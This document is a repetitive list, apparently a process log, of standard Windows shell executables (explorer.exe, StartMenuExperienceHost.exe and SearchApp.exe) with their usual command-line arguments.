"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
